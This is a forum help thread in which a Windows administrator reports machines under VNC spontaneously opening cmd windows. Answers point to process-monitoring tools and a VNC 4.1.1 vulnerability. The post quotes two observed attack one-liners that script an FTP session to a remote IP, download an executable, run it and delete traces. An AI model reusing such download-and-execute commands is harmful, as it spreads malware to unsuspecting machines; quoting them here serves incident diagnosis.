Solved

cmd opens, runs ftp command and closes

Posted on 2006-11-30
5
527 Views
Last Modified: 2008-01-09
hi all

I have some wxpSP2/W2003Server boxes being watch with VNC, watching what they are doing.   sometimes they open a cmd window with the following commands

cmd.exe /c del i&echo open 10.200.17.43 18766 > i&echo user 1 1 >> i &echo get 674.exe >> i &echo quit >> i &ftp -n -s:i &674.exe&del i&exit
cmd.exe /c del i&echo open 10.200.27.43 8196 > i&echo user 1 1 >> i &echo get 072.exe >> i &echo quit >> i &ftp -n -s:i &072.exe&del i&exit

ive seen this in some other computers, with virus, sometimes i see it trying to download other exe names.

i've already  avg-adaware-spybot-regedit-systedit'ED  those boxes and nothing strange came out,

i took a photo of the process list after and before and the only different thing is CMD run supossedly by me.

i ve seen this in some other computers and im sure im not the only one.

any ideas ?

I hate xp, how can someone run something on a computer that does not have nothing to do with internet ?   the only thing that is internet related in that box is antivirus updating.  

I HATE XP ZILLION Vulnerabilities.


0
Comment
Question by:HTorres
  • 2
  • 2
5 Comments
 
LVL 4

Author Comment

by:HTorres
ID: 18051858
Thanks in advance all
0
 
LVL 70

Expert Comment

by:Merete
ID: 18052350
These days anything is possible I would be concerned with too, any staff clients trying to hack into the system?
Here is two great tools from systernals
process explorer may assist you
Ever wondered which program has a particular file or directory open? Now you can find out. Process Explorer shows you information about which handles and DLLs processes have opened or loaded.
http://www.microsoft.com/technet/sysinternals/utilities/ProcessExplorer.mspx

RegMon for Windows v7.04
http://www.microsoft.com/technet/sysinternals/utilities/regmon.mspx

All Systernal tools
http://www.microsoft.com/technet/sysinternals/default.mspx

Active Ports is another great little tool it will show which ports are active and you can queiry it and even stop them.
http://www.download.com/3000-2085-10062969.html

Hope they bring some light to this issue
Merete
0
 
LVL 11

Accepted Solution

by:
ch2 earned 250 total points
ID: 18052401
This is a vulnerability of the VNC.

This PAQ: http:Q_22047347.html
0
 
LVL 4

Author Comment

by:HTorres
ID: 18055261
Merete, great links
thank you!

--

Ch2, that was it!!!

Ive noticed that this thing only happened in vnc411, the other computers where we have vnc412 are without incidents.

One thing came to my mind.  my ISP is a moron and they have all ports closed (they even tried to close port 25) ... so i can connect from here to other computers via internet, but i cannot connect (from there) to our computers here
How can someone could enter here and exploit a vulnerability and I cannot connect ?

i will take a look at activeports

what port they are using?

0
 
LVL 70

Expert Comment

by:Merete
ID: 18058904
thanks glad you like them  
0

Featured Post

Backup Your Microsoft Windows Server®

Backup all your Microsoft Windows Server – on-premises, in remote locations, in private and hybrid clouds. Your entire Windows Server will be backed up in one easy step with patented, block-level disk imaging. We achieve RTOs (recovery time objectives) as low as 15 seconds.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

Sometimes people don't understand why download speed shows differently for Windows than Linux.Specially, this article covers and shows the solution for throughput difference for Windows than a Linux machine. For this, I arranged a test scenario.I…
Today, still in the boom of Apple, PC's and products, nearly 50% of the computer users use Windows as graphical operating systems. If you are among those users who love windows, but are grappling to keep the system's hard drive optimized, then you s…
This Micro Tutorial will teach you how to censor certain areas of your screen. The example in this video will show a little boy's face being blurred. This will be demonstrated using Adobe Premiere Pro CS6.
Two types of users will appreciate AOMEI Backupper Pro: 1 - Those with PCIe drives (and haven't found cloning software that works on them). 2 - Those who want a fast clone of their boot drive (no re-boots needed) and it can clone your drive wh…

770 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question